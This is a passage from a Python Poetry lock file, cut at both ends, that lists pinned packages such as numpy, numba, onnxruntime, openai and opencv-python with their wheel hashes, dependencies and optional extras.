"*" [package.extras] dev = ["black", "cairosvg", "coverage", "mkautodoc", "mkdocs-jupyter", "mkdocs-material", "mkdocstrings[python]", "myst-parser", "pillow", "pylint", "pytest", "twine"] gpt4all = ["peft (==0.3.0.dev0)", "sentencepiece", "torch", "transformers (==4.28.0.dev0)"] [[package]] name = "notebook" version = "7.0.6" description = "Jupyter Notebook - A web-based notebook environment for interactive computing" optional = false python-versions = ">=3.8" files = [ {file = "notebook-7.0.6-py3-none-any.whl", hash = "sha256:0fe8f67102fea3744fedf652e4c15339390902ca70c5a31c4f547fa23da697cc"}, {file = "notebook-7.0.6.tar.gz", hash = "sha256:ec6113b06529019f7f287819af06c97a2baf7a95ac21a8f6e32192898e9f9a58"}, ] [package.dependencies] jupyter-server = ">=2.4.0,<3" jupyterlab = ">=4.0.2,<5" jupyterlab-server = ">=2.22.1,<3" notebook-shim = ">=0.2,<0.3" tornado = ">=6.2.0" [package.extras] dev = ["hatch", "pre-commit"] docs = ["myst-parser", "nbsphinx", "pydata-sphinx-theme", "sphinx (>=1.3.6)", "sphinxcontrib-github-alt", "sphinxcontrib-spelling"] test = ["importlib-resources (>=5.0)", "ipykernel", "jupyter-server[test] (>=2.4.0,<3)", "jupyterlab-server[test] (>=2.22.1,<3)", "nbval", "pytest (>=7.0)", "pytest-console-scripts", "pytest-timeout", "pytest-tornasync", "requests"] [[package]] name = "notebook-shim" version = "0.2.3" description = "A shim layer for notebook traits and config" optional = false python-versions = ">=3.7" files = [ {file = "notebook_shim-0.2.3-py3-none-any.whl", hash = "sha256:a83496a43341c1674b093bfcebf0fe8e74cbe7eda5fd2bbc56f8e39e1486c0c7"}, {file = "notebook_shim-0.2.3.tar.gz", hash = "sha256:f69388ac283ae008cd506dda10d0288b09a017d822d5e8c7129a152cbd3ce7e9"}, ] [package.dependencies] jupyter-server = ">=1.8,<3" [package.extras] test = ["pytest", "pytest-console-scripts", "pytest-jupyter", "pytest-tornasync"] [[package]] name = "numba" version = "0.58.1" description = "compiling Python code using LLVM" optional = true python-versions = ">=3.8" files = [ {file = "numba-0.58.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:07f2fa7e7144aa6f275f27260e73ce0d808d3c62b30cff8906ad1dec12d87bbe"}, {file = "numba-0.58.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:7bf1ddd4f7b9c2306de0384bf3854cac3edd7b4d8dffae2ec1b925e4c436233f"}, {file = "numba-0.58.1-cp310-cp310-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:bc2d904d0319d7a5857bd65062340bed627f5bfe9ae4a495aef342f072880d50"}, {file = "numba-0.58.1-cp310-cp310-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:4e79b6cc0d2bf064a955934a2e02bf676bc7995ab2db929dbbc62e4c16551be6"}, {file = "numba-0.58.1-cp310-cp310-win_amd64.whl", hash = "sha256:81fe5b51532478149b5081311b0fd4206959174e660c372b94ed5364cfb37c82"}, {file = "numba-0.58.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:bcecd3fb9df36554b342140a4d77d938a549be635d64caf8bd9ef6c47a47f8aa"}, {file = "numba-0.58.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:a1eaa744f518bbd60e1f7ccddfb8002b3d06bd865b94a5d7eac25028efe0e0ff"}, {file = "numba-0.58.1-cp311-cp311-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:bf68df9c307fb0aa81cacd33faccd6e419496fdc621e83f1efce35cdc5e79cac"}, {file = "numba-0.58.1-cp311-cp311-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:55a01e1881120e86d54efdff1be08381886fe9f04fc3006af309c602a72bc44d"}, {file = "numba-0.58.1-cp311-cp311-win_amd64.whl", hash = "sha256:811305d5dc40ae43c3ace5b192c670c358a89a4d2ae4f86d1665003798ea7a1a"}, {file = "numba-0.58.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:ea5bfcf7d641d351c6a80e8e1826eb4a145d619870016eeaf20bbd71ef5caa22"}, {file = "numba-0.58.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:e63d6aacaae1ba4ef3695f1c2122b30fa3d8ba039c8f517784668075856d79e2"}, {file = "numba-0.58.1-cp38-cp38-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:6fe7a9d8e3bd996fbe5eac0683227ccef26cba98dae6e5cee2c1894d4b9f16c1"}, {file = "numba-0.58.1-cp38-cp38-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:898af055b03f09d33a587e9425500e5be84fc90cd2f80b3fb71c6a4a17a7e354"}, {file = "numba-0.58.1-cp38-cp38-win_amd64.whl", hash = "sha256:d3e2fe81fe9a59fcd99cc572002101119059d64d31eb6324995ee8b0f144a306"}, {file = "numba-0.58.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:5c765aef472a9406a97ea9782116335ad4f9ef5c9f93fc05fd44aab0db486954"}, {file = "numba-0.58.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:9e9356e943617f5e35a74bf56ff6e7cc83e6b1865d5e13cee535d79bf2cae954"}, {file = "numba-0.58.1-cp39-cp39-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:240e7a1ae80eb6b14061dc91263b99dc8d6af9ea45d310751b780888097c1aaa"}, {file = "numba-0.58.1-cp39-cp39-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:45698b995914003f890ad839cfc909eeb9c74921849c712a05405d1a79c50f68"}, {file = "numba-0.58.1-cp39-cp39-win_amd64.whl", hash = "sha256:bd3dda77955be03ff366eebbfdb39919ce7c2620d86c906203bed92124989032"}, {file = "numba-0.58.1.tar.gz", hash = "sha256:487ded0633efccd9ca3a46364b40006dbdaca0f95e99b8b83e778d1195ebcbaa"}, ] [package.dependencies] importlib-metadata = {version = "*", markers = "python_version < \"3.9\""} llvmlite = "==0.41.*" numpy = ">=1.22,<1.27" [[package]] name = "numexpr" version = "2.8.6" description = "Fast numerical expression evaluator for NumPy" optional = true python-versions = ">=3.7" files = [ {file = "numexpr-2.8.6-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:80acbfefb68bd92e708e09f0a02b29e04d388b9ae72f9fcd57988aca172a7833"}, {file = "numexpr-2.8.6-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:6e884687da8af5955dc9beb6a12d469675c90b8fb38b6c93668c989cfc2cd982"}, {file = "numexpr-2.8.6-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9ef7e8aaa84fce3aba2e65f243d14a9f8cc92aafd5d90d67283815febfe43eeb"}, {file = "numexpr-2.8.6-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dee04d72307c09599f786b9231acffb10df7d7a74b2ce3681d74a574880d13ce"}, {file = "numexpr-2.8.6-cp310-cp310-win32.whl", hash = "sha256:211804ec25a9f6d188eadf4198dd1a92b2f61d7d20993c6c7706139bc4199c5b"}, {file = "numexpr-2.8.6-cp310-cp310-win_amd64.whl", hash = "sha256:18b1804923cfa3be7bbb45187d01c0540c8f6df4928c22a0f786e15568e9ebc5"}, {file = "numexpr-2.8.6-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:95b9da613761e4fc79748535b2a1f58cada22500e22713ae7d9571fa88d1c2e2"}, {file = "numexpr-2.8.6-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:47b45da5aa25600081a649f5e8b2aa640e35db3703f4631f34bb1f2f86d1b5b4"}, {file = "numexpr-2.8.6-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:84979bf14143351c2db8d9dd7fef8aca027c66ad9df9cb5e75c93bf5f7b5a338"}, {file = "numexpr-2.8.6-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d36528a33aa9c23743b3ea686e57526a4f71e7128a1be66210e1511b09c4e4e9"}, {file = "numexpr-2.8.6-cp311-cp311-win32.whl", hash = "sha256:681812e2e71ff1ba9145fac42d03f51ddf6ba911259aa83041323f68e7458002"}, {file = "numexpr-2.8.6-cp311-cp311-win_amd64.whl", hash = "sha256:27782177a0081bd0aab229be5d37674e7f0ab4264ef576697323dd047432a4cd"}, {file = "numexpr-2.8.6-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:ef6e8896457a60a539cb6ba27da78315a9bb31edb246829b25b5b0304bfcee91"}, {file = "numexpr-2.8.6-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e640bc0eaf1b59f3dde52bc02bbfda98e62f9950202b0584deba28baf9f36bbb"}, {file = "numexpr-2.8.6-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d126938c2c3784673c9c58d94e00b1570aa65517d9c33662234d442fc9fb5795"}, {file = "numexpr-2.8.6-cp37-cp37m-win32.whl", hash = "sha256:e93d64cd20940b726477c3cb64926e683d31b778a1e18f9079a5088fd0d8e7c8"}, {file = "numexpr-2.8.6-cp37-cp37m-win_amd64.whl", hash = "sha256:31cf610c952eec57081171f0b4427f9bed2395ec70ec432bbf45d260c5c0cdeb"}, {file = "numexpr-2.8.6-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:b5f96c89aa0b1f13685ec32fa3d71028db0b5981bfd99a0bbc271035949136b3"}, {file = "numexpr-2.8.6-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:c8f37f7a6af3bdd61f2efd1cafcc083a9525ab0aaf5dc641e7ec8fc0ae2d3aa1"}, {file = "numexpr-2.8.6-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:38b8b90967026bbc36c7aa6e8ca3b8906e1990914fd21f446e2a043f4ee3bc06"}, {file = "numexpr-2.8.6-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1967c16f61c27df1cdc43ba3c0ba30346157048dd420b4259832276144d0f64e"}, {file = "numexpr-2.8.6-cp38-cp38-win32.whl", hash = "sha256:15469dc722b5ceb92324ec8635411355ebc702303db901ae8cc87f47c5e3a124"}, {file = "numexpr-2.8.6-cp38-cp38-win_amd64.whl", hash = "sha256:95c09e814b0d6549de98b5ded7cdf7d954d934bb6b505432ff82e83a6d330bda"}, {file = "numexpr-2.8.6-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:aa0f661f5f4872fd7350cc9895f5d2594794b2a7e7f1961649a351724c64acc9"}, {file = "numexpr-2.8.6-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:8e3e6f1588d6c03877cb3b3dcc3096482da9d330013b886b29cb9586af5af3eb"}, {file = "numexpr-2.8.6-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8564186aad5a2c88d597ebc79b8171b52fd33e9b085013e1ff2208f7e4b387e3"}, {file = "numexpr-2.8.6-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d6a88d71c166e86b98d34701285d23e3e89d548d9f5ae3f4b60919ac7151949f"}, {file = "numexpr-2.8.6-cp39-cp39-win32.whl", hash = "sha256:c48221b6a85494a7be5a022899764e58259af585dff031cecab337277278cc93"}, {file = "numexpr-2.8.6-cp39-cp39-win_amd64.whl", hash = "sha256:6d7003497d82ef19458dce380b36a99343b96a3bd5773465c2d898bf8f5a38f9"}, {file = "numexpr-2.8.6.tar.gz", hash = "sha256:6336f8dba3f456e41a4ffc3c97eb63d89c73589ff6e1707141224b930263260d"}, ] [package.dependencies] numpy = ">=1.13.3" [[package]] name = "numpy" version = "1.24.4" description = "Fundamental package for array computing in Python" optional = false python-versions = ">=3.8" files = [ {file = "numpy-1.24.4-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:c0bfb52d2169d58c1cdb8cc1f16989101639b34c7d3ce60ed70b19c63eba0b64"}, {file = "numpy-1.24.4-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:ed094d4f0c177b1b8e7aa9cba7d6ceed51c0e569a5318ac0ca9a090680a6a1b1"}, {file = "numpy-1.24.4-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:79fc682a374c4a8ed08b331bef9c5f582585d1048fa6d80bc6c35bc384eee9b4"}, {file = "numpy-1.24.4-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7ffe43c74893dbf38c2b0a1f5428760a1a9c98285553c89e12d70a96a7f3a4d6"}, {file = "numpy-1.24.4-cp310-cp310-win32.whl", hash = "sha256:4c21decb6ea94057331e111a5bed9a79d335658c27ce2adb580fb4d54f2ad9bc"}, {file = "numpy-1.24.4-cp310-cp310-win_amd64.whl", hash = "sha256:b4bea75e47d9586d31e892a7401f76e909712a0fd510f58f5337bea9572c571e"}, {file = "numpy-1.24.4-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:f136bab9c2cfd8da131132c2cf6cc27331dd6fae65f95f69dcd4ae3c3639c810"}, {file = "numpy-1.24.4-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:e2926dac25b313635e4d6cf4dc4e51c8c0ebfed60b801c799ffc4c32bf3d1254"}, {file = "numpy-1.24.4-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:222e40d0e2548690405b0b3c7b21d1169117391c2e82c378467ef9ab4c8f0da7"}, {file = "numpy-1.24.4-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7215847ce88a85ce39baf9e89070cb860c98fdddacbaa6c0da3ffb31b3350bd5"}, {file = "numpy-1.24.4-cp311-cp311-win32.whl", hash = "sha256:4979217d7de511a8d57f4b4b5b2b965f707768440c17cb70fbf254c4b225238d"}, {file = "numpy-1.24.4-cp311-cp311-win_amd64.whl", hash = "sha256:b7b1fc9864d7d39e28f41d089bfd6353cb5f27ecd9905348c24187a768c79694"}, {file = "numpy-1.24.4-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:1452241c290f3e2a312c137a9999cdbf63f78864d63c79039bda65ee86943f61"}, {file = "numpy-1.24.4-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:04640dab83f7c6c85abf9cd729c5b65f1ebd0ccf9de90b270cd61935eef0197f"}, {file = "numpy-1.24.4-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a5425b114831d1e77e4b5d812b69d11d962e104095a5b9c3b641a218abcc050e"}, {file = "numpy-1.24.4-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dd80e219fd4c71fc3699fc1dadac5dcf4fd882bfc6f7ec53d30fa197b8ee22dc"}, {file = "numpy-1.24.4-cp38-cp38-win32.whl", hash = "sha256:4602244f345453db537be5314d3983dbf5834a9701b7723ec28923e2889e0bb2"}, {file = "numpy-1.24.4-cp38-cp38-win_amd64.whl", hash = "sha256:692f2e0f55794943c5bfff12b3f56f99af76f902fc47487bdfe97856de51a706"}, {file = "numpy-1.24.4-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:2541312fbf09977f3b3ad449c4e5f4bb55d0dbf79226d7724211acc905049400"}, {file = "numpy-1.24.4-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:9667575fb6d13c95f1b36aca12c5ee3356bf001b714fc354eb5465ce1609e62f"}, {file = "numpy-1.24.4-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f3a86ed21e4f87050382c7bc96571755193c4c1392490744ac73d660e8f564a9"}, {file = "numpy-1.24.4-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d11efb4dbecbdf22508d55e48d9c8384db795e1b7b51ea735289ff96613ff74d"}, {file = "numpy-1.24.4-cp39-cp39-win32.whl", hash = "sha256:6620c0acd41dbcb368610bb2f4d83145674040025e5536954782467100aa8835"}, {file = "numpy-1.24.4-cp39-cp39-win_amd64.whl", hash = "sha256:befe2bf740fd8373cf56149a5c23a0f601e82869598d41f8e188a0e9869926f8"}, {file = "numpy-1.24.4-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:31f13e25b4e304632a4619d0e0777662c2ffea99fcae2029556b17d8ff958aef"}, {file = "numpy-1.24.4-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:95f7ac6540e95bc440ad77f56e520da5bf877f87dca58bd095288dce8940532a"}, {file = "numpy-1.24.4-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:e98f220aa76ca2a977fe435f5b04d7b3470c0a2e6312907b37ba6068f26787f2"}, {file = "numpy-1.24.4.tar.gz", hash = "sha256:80f5e3a4e498641401868df4208b74581206afbee7cf7b8329daae82676d9463"}, ] [[package]] name = "nvidia-cublas-cu11" version = "11.10.3.66" description = "CUBLAS native runtime libraries" optional = true python-versions = ">=3" files = [ {file = "nvidia_cublas_cu11-11.10.3.66-py3-none-manylinux1_x86_64.whl", hash = "sha256:d32e4d75f94ddfb93ea0a5dda08389bcc65d8916a25cb9f37ac89edaeed3bded"}, {file = "nvidia_cublas_cu11-11.10.3.66-py3-none-win_amd64.whl", hash = "sha256:8ac17ba6ade3ed56ab898a036f9ae0756f1e81052a317bf98f8c6d18dc3ae49e"}, ] [package.dependencies] setuptools = "*" wheel = "*" [[package]] name = "nvidia-cuda-nvrtc-cu11" version = "11.7.99" description = "NVRTC native runtime libraries" optional = true python-versions = ">=3" files = [ {file = "nvidia_cuda_nvrtc_cu11-11.7.99-2-py3-none-manylinux1_x86_64.whl", hash = "sha256:9f1562822ea264b7e34ed5930567e89242d266448e936b85bc97a3370feabb03"}, {file = "nvidia_cuda_nvrtc_cu11-11.7.99-py3-none-manylinux1_x86_64.whl", hash = "sha256:f7d9610d9b7c331fa0da2d1b2858a4a8315e6d49765091d28711c8946e7425e7"}, {file = "nvidia_cuda_nvrtc_cu11-11.7.99-py3-none-win_amd64.whl", hash = "sha256:f2effeb1309bdd1b3854fc9b17eaf997808f8b25968ce0c7070945c4265d64a3"}, ] [package.dependencies] setuptools = "*" wheel = "*" [[package]] name = "nvidia-cuda-runtime-cu11" version = "11.7.99" description = "CUDA Runtime native Libraries" optional = true python-versions = ">=3" files = [ {file = "nvidia_cuda_runtime_cu11-11.7.99-py3-none-manylinux1_x86_64.whl", hash = "sha256:cc768314ae58d2641f07eac350f40f99dcb35719c4faff4bc458a7cd2b119e31"}, {file = "nvidia_cuda_runtime_cu11-11.7.99-py3-none-win_amd64.whl", hash = "sha256:bc77fa59a7679310df9d5c70ab13c4e34c64ae2124dd1efd7e5474b71be125c7"}, ] [package.dependencies] setuptools = "*" wheel = "*" [[package]] name = "nvidia-cudnn-cu11" version = "8.5.0.96" description = "cuDNN runtime libraries" optional = true python-versions = ">=3" files = [ {file = "nvidia_cudnn_cu11-8.5.0.96-2-py3-none-manylinux1_x86_64.whl", hash = "sha256:402f40adfc6f418f9dae9ab402e773cfed9beae52333f6d86ae3107a1b9527e7"}, {file = "nvidia_cudnn_cu11-8.5.0.96-py3-none-manylinux1_x86_64.whl", hash = "sha256:71f8111eb830879ff2836db3cccf03bbd735df9b0d17cd93761732ac50a8a108"}, ] [package.dependencies] setuptools = "*" wheel = "*" [[package]] name = "o365" version = "2.0.28" description = "Microsoft Graph and Office 365 API made easy" optional = true python-versions = ">=3.4" files = [ {file = "O365-2.0.28-py3-none-any.whl", hash = "sha256:61127377a4f5ed55f447ad20fbd02d78f06b50696b12f3ad2c608bdf911eef7b"}, {file = "O365-2.0.28.tar.gz", hash = "sha256:f1ab2f8ecaa399da7202df554a0b55a70358bbaead82bb0fcd048e67aac822f3"}, ] [package.dependencies] beautifulsoup4 = ">=4.0.0" python-dateutil = ">=2.7" pytz = ">=2018.5" requests = ">=2.18.0" requests-oauthlib = ">=1.2.0" stringcase = ">=1.2.0" tzlocal = ">=4.0,<5.0" [[package]] name = "oauthlib" version = "3.2.2" description = "A generic, spec-compliant, thorough implementation of the OAuth request-signing logic" optional = true python-versions = ">=3.6" files = [ {file = "oauthlib-3.2.2-py3-none-any.whl", hash = "sha256:8139f29aac13e25d502680e9e19963e83f16838d48a0d71c287fe40e7067fbca"}, {file = "oauthlib-3.2.2.tar.gz", hash = "sha256:9859c40929662bec5d64f34d01c99e093149682a3f38915dc0655d5a633dd918"}, ] [package.extras] rsa = ["cryptography (>=3.0.0)"] signals = ["blinker (>=1.4.0)"] signedtoken = ["cryptography (>=3.0.0)", "pyjwt (>=2.0.0,<3)"] [[package]] name = "onnxruntime" version = "1.16.1" description = "ONNX Runtime is a runtime accelerator for Machine Learning models" optional = true python-versions = "*" files = [ {file = "onnxruntime-1.16.1-cp310-cp310-macosx_10_15_x86_64.whl", hash = "sha256:28b2c7f444b4119950b69370801cd66067f403d19cbaf2a444735d7c269cce4a"}, {file = "onnxruntime-1.16.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:c24e04f33e7899f6aebb03ed51e51d346c1f906b05c5569d58ac9a12d38a2f58"}, {file = "onnxruntime-1.16.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9fa93b166f2d97063dc9f33c5118c5729a4a5dd5617296b6dbef42f9047b3e81"}, {file = "onnxruntime-1.16.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:042dd9201b3016ee18f8f8bc4609baf11ff34ca1ff489c0a46bcd30919bf883d"}, {file = "onnxruntime-1.16.1-cp310-cp310-win32.whl", hash = "sha256:c20aa0591f305012f1b21aad607ed96917c86ae7aede4a4dd95824b3d124ceb7"}, {file = "onnxruntime-1.16.1-cp310-cp310-win_amd64.whl", hash = "sha256:5581873e578917bea76d6434ee7337e28195d03488dcf72d161d08e9398c6249"}, {file = "onnxruntime-1.16.1-cp311-cp311-macosx_10_15_x86_64.whl", hash = "sha256:ef8c0c8abf5f309aa1caf35941380839dc5f7a2fa53da533be4a3f254993f120"}, {file = "onnxruntime-1.16.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:e680380bea35a137cbc3efd67a17486e96972901192ad3026ee79c8d8fe264f7"}, {file = "onnxruntime-1.16.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5e62cc38ce1a669013d0a596d984762dc9c67c56f60ecfeee0d5ad36da5863f6"}, {file = "onnxruntime-1.16.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:025c7a4d57bd2e63b8a0f84ad3df53e419e3df1cc72d63184f2aae807b17c13c"}, {file = "onnxruntime-1.16.1-cp311-cp311-win32.whl", hash = "sha256:9ad074057fa8d028df248b5668514088cb0937b6ac5954073b7fb9b2891ffc8c"}, {file = "onnxruntime-1.16.1-cp311-cp311-win_amd64.whl", hash = "sha256:d5e43a3478bffc01f817ecf826de7b25a2ca1bca8547d70888594ab80a77ad24"}, {file = "onnxruntime-1.16.1-cp38-cp38-macosx_10_15_x86_64.whl", hash = "sha256:3aef4d70b0930e29a8943eab248cd1565664458d3a62b2276bd11181f28fd0a3"}, {file = "onnxruntime-1.16.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:55a7b843a57c8ca0c8ff169428137958146081d5d76f1a6dd444c4ffcd37c3c2"}, {file = "onnxruntime-1.16.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:62c631af1941bf3b5f7d063d24c04aacce8cff0794e157c497e315e89ac5ad7b"}, {file = "onnxruntime-1.16.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5671f296c3d5c233f601e97a10ab5a1dd8e65ba35c7b7b0c253332aba9dff330"}, {file = "onnxruntime-1.16.1-cp38-cp38-win32.whl", hash = "sha256:eb3802305023dd05e16848d4e22b41f8147247894309c0c27122aaa08793b3d2"}, {file = "onnxruntime-1.16.1-cp38-cp38-win_amd64.whl", hash = "sha256:fecfb07443d09d271b1487f401fbdf1ba0c829af6fd4fe8f6af25f71190e7eb9"}, {file = "onnxruntime-1.16.1-cp39-cp39-macosx_10_15_x86_64.whl", hash = "sha256:de3e12094234db6545c67adbf801874b4eb91e9f299bda34c62967ef0050960f"}, {file = "onnxruntime-1.16.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:ff723c2a5621b5e7103f3be84d5aae1e03a20621e72219dddceae81f65f240af"}, {file = "onnxruntime-1.16.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:14a7fb3073aaf6b462e3d7fb433320f7700558a8892e5021780522dc4574292a"}, {file = "onnxruntime-1.16.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:963159f1f699b0454cd72fcef3276c8a1aab9389a7b301bcd8e320fb9d9e8597"}, {file = "onnxruntime-1.16.1-cp39-cp39-win32.whl", hash = "sha256:85771adb75190db9364b25ddec353ebf07635b83eb94b64ed014f1f6d57a3857"}, {file = "onnxruntime-1.16.1-cp39-cp39-win_amd64.whl", hash = "sha256:d32d2b30799c1f950123c60ae8390818381fd5f88bdf3627eeca10071c155dc5"}, ] [package.dependencies] coloredlogs = "*" flatbuffers = "*" numpy = ">=1.21.6" packaging = "*" protobuf = "*" sympy = "*" [[package]] name = "openai" version = "0.27.10" description = "Python client library for the OpenAI API" optional = false python-versions = ">=3.7.1" files = [ {file = "openai-0.27.10-py3-none-any.whl", hash = "sha256:beabd1757e3286fa166dde3b70ebb5ad8081af046876b47c14c41e203ed22a14"}, {file = "openai-0.27.10.tar.gz", hash = "sha256:60e09edf7100080283688748c6803b7b3b52d5a55d21890f3815292a0552d83b"}, ] [package.dependencies] aiohttp = "*" requests = ">=2.20" tqdm = "*" [package.extras] datalib = ["numpy", "openpyxl (>=3.0.7)", "pandas (>=1.2.3)", "pandas-stubs (>=1.1.0.11)"] dev = ["black (>=21.6b0,<22.0)", "pytest (==6.*)", "pytest-asyncio", "pytest-mock"] embeddings = ["matplotlib", "numpy", "openpyxl (>=3.0.7)", "pandas (>=1.2.3)", "pandas-stubs (>=1.1.0.11)", "plotly", "scikit-learn (>=1.0.2)", "scipy", "tenacity (>=8.0.1)"] wandb = ["numpy", "openpyxl (>=3.0.7)", "pandas (>=1.2.3)", "pandas-stubs (>=1.1.0.11)", "wandb"] [[package]] name = "openapi-pydantic" version = "0.3.2" description = "Pydantic OpenAPI schema implementation" optional = true python-versions = ">=3.8,<4.0" files = [ {file = "openapi_pydantic-0.3.2-py3-none-any.whl", hash = "sha256:24488566a0a61bee3b55de6d3665329adaf2aadfe8f292ac0bddfe22155fadac"}, {file = "openapi_pydantic-0.3.2.tar.gz", hash = "sha256:685aa631395c469ecfd04f01a2ffedd541f94d372943868a501b412e9de6ba8b"}, ] [package.dependencies] pydantic = ">=1.8" [[package]] name = "opencv-python" version = "4.8.1.78" description = "Wrapper package for OpenCV python bindings." optional = true python-versions = ">=3.6" files = [ {file = "opencv-python-4.8.1.78.tar.gz", hash = "sha256:cc7adbbcd1112877a39274106cb2752e04984bc01a031162952e97450d6117f6"}, {file = "opencv_python-4.8.1.78-cp37-abi3-macosx_10_16_x86_64.whl", hash = "sha256:91d5f6f5209dc2635d496f6b8ca6573ecdad051a09e6b5de4c399b8e673c60da"}, {file = "opencv_python-4.8.1.78-cp37-abi3-macosx_11_0_arm64.whl", hash = "sha256:bc31f47e05447da8b3089faa0a07ffe80e114c91ce0b171e6424f9badbd1c5cd"}, {file = "opencv_python-4.8.1.78-cp37-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9814beca408d3a0eca1bae7e3e5be68b07c17ecceb392b94170881216e09b319"}, {file = "opencv_python-4.8.1.78-cp37-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c4c406bdb41eb21ea51b4e90dfbc989c002786c3f601c236a99c59a54670a394"}, {file = "opencv_python-4.8.1.78-cp37-abi3-win32.whl", hash = "sha256:a7aac3900fbacf55b551e7b53626c3dad4c71ce85643645c43e91fcb19045e47"}, {file = "opencv_python-4.8.1.78-cp37-abi3-win_amd64.whl", hash = "sha256:b983197f97cfa6fcb74e1da1802c7497a6f94ed561aba6980f1f33123f904956"}, ] [package.dependencies] numpy = [ {version = ">=1.23.5", markers = "python_version >= \"3.11\""}, {version = ">=1.21.0", markers = "python_version <= \"3.9\" and platform_system == \"Darwin\" and platform_machine == \"arm64\" and python_version >= \"3.8\""}, {version = ">=1.19.3", markers = "platform_system == \"Linux\" and platform_machine == \"aarch64\" and python_version >= \"3.8\" and python_version < \"3.10\" or python_version > \"3.9\" and python_version < \"3.10\" or python_version >= \"3.9\" and platform_system != \"Darwin\" and python_version < \"3.10\" or python_version >= \"3.9\" and platform_machine != \"arm64\" and python_version < \"3.10\""}, {version = ">=1.17.3", markers = "(platform_system != \"Darwin\" and platform_system != \"Linux\") and python_version >= \"3.8\" and python_version < \"3.9\" or platform_system != \"Darwin\" and python_version >= \"3.8\" and python_version < \"3.9\" and platform_machine != \"aarch64\" or platform_machine != \"arm64\" and python_version >= \"3.8\" and python_version < \"3.9\" and platform_system != \"Linux\" or (platform_machine != \"arm64\" and platform_machine != \"aarch64\") and python_version >= \"3.8\" and python_version < \"3.9\""}, {version = ">=1.21.4", markers = "python_version >= \"3.10\" and platform_system == \"Darwin\" and python_version < \"3.11\""}, {version = ">=1.21.2", markers = "platform_system != \"Darwin\" and python_version >= \"3.10\" and python_version < \"3.11\""}, 